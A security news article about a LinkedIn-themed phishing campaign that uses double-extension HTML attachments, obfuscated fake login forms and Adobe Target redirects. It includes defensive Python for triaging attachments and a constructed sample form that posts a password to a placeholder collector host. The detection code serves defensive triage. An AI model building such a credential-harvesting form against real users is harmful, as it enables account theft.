Fake LinkedIn Collaboration Emails Abuse Adobe Target to Track Victims in Phishing Campaign
- Deceptive Tactics: Cybercriminals abuse Adobe infrastructure to harvest LinkedIn credentials.
- Malicious Attachments: Fake contract files use double extensions and obfuscated JavaScript.
- Victim Tracking: A domain associated with the Adobe Target A/B testing platform is being abused for redirection and to track compromised users.
A LinkedIn-themed phishing campaign, initiated via emails posing as business inquiries with an attached PDF, abuses Adobe infrastructure as a redirect point. The operation steals user passwords and then redirects victims to the legitimate LinkedIn site to avoid detection.
Adobe Target A/B Testing Abuse
The phishing attack begins with an email that masquerades as a standard business inquiry sent via LinkedIn, Malwarebytes researchers have discovered. Threat actors include a fake contract attachment that appears to be a PDF but uses a deceptive double file extension, .pdf.html.
The attached file is a highly obfuscated HTML document. When a user opens the attachment, they see a fake login form in which the target's email address is hardcoded. The operation leverages an Adobe Target URL, which attackers abuse as a redirect point to track victims.
Once the victim interacts with the page, the submitted credentials are sent directly to a PHP file hosted on a Russian domain. The user is then seamlessly redirected to the real LinkedIn domain.
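For mail-gateway or SOC triage, the traits described above can be checked statically. The following is an added example, not code from Malwarebytes or from the campaign; the function names, extension sets and sample attachment are constructed, and because the real attachment is obfuscated, the content checks assume markup that has already been de-obfuscated or rendered (the filename check does not).

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

DOC_EXTS = {"pdf", "doc", "docx", "xls", "xlsx"}   # what the file pretends to be
HTML_EXTS = {"html", "htm", "shtml", "xhtml"}      # what the browser actually opens
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")

def deceptive_double_extension(filename):
    """True for names like contract.pdf.html: a document extension, then an HTML one."""
    parts = filename.lower().strip().rstrip(".").split(".")
    return len(parts) >= 3 and parts[-1] in HTML_EXTS and parts[-2] in DOC_EXTS

class FormScan(HTMLParser):
    """Collects login-form traits: password input, pre-filled email, absolute form action."""
    def __init__(self):
        super().__init__()
        self.password_field, self.prefilled_email, self.remote_hosts = False, None, []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}       # valueless attributes arrive as None
        if tag == "input":
            self.password_field |= a.get("type", "").lower() == "password"
            if EMAIL_RE.fullmatch(a.get("value", "").strip()):
                self.prefilled_email = a["value"].strip()
        elif tag == "form":
            host = urlparse(a.get("action", "")).hostname
            if host:                               # a local HTML file posting to a remote host
                self.remote_hosts.append(host)

def triage_attachment(filename, html_text):
    """Return the list of red flags found in one attachment."""
    scan = FormScan()
    scan.feed(html_text)
    checks = [
        ("double-extension", deceptive_double_extension(filename)),
        ("password-field", scan.password_field),
        ("hardcoded-email", scan.prefilled_email is not None),
        ("remote-form-action", bool(scan.remote_hosts)),
    ]
    return [name for name, hit in checks if hit]

# Constructed sample (placeholder host and address, not indicators from the campaign).
SAMPLE_NAME = "contract.pdf.html"
SAMPLE_HTML = '''<form action="https://collector.example/submit.php" method="post">
<input type="email" value="target.user@example.com" readonly>
<input type="password" name="p"></form>'''

if __name__ == "__main__":
    print(triage_attachment(SAMPLE_NAME, SAMPLE_HTML))
```

Any single flag is weak on its own; a document-looking HTML attachment that also carries a password field posting to a remote host is the combination worth quarantining.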
Red Flags and Mitigation
Malwarebytes researchers identified several other red flags within these communications. The sender's name, email address, and email signature do not match. The sender's company actually exists but is not located in the U.S., and the sender's name belongs to a real person who does not work at the specified company.
Beyond avoiding unsolicited attachments, Malwarebytes' advice includes:
- Only access your accounts through official apps or by typing the official website directly into your browser.
- Check file extensions carefully.
- Enable multi-factor authentication (MFA) for your critical accounts.
- Use an up-to-date, real-time anti-malware solution with a web protection module.
This month, a phishing campaign impersonating the U.S. Social Security Administration targeted 80+ organizations. A March Cofense report said attackers are leveraging convincing LinkedIn notification system alerts to steal user credentials.
Early this year, Lazarus Group attempted to scam developers via fake LinkedIn jobs that redirected to malware-infected websites.






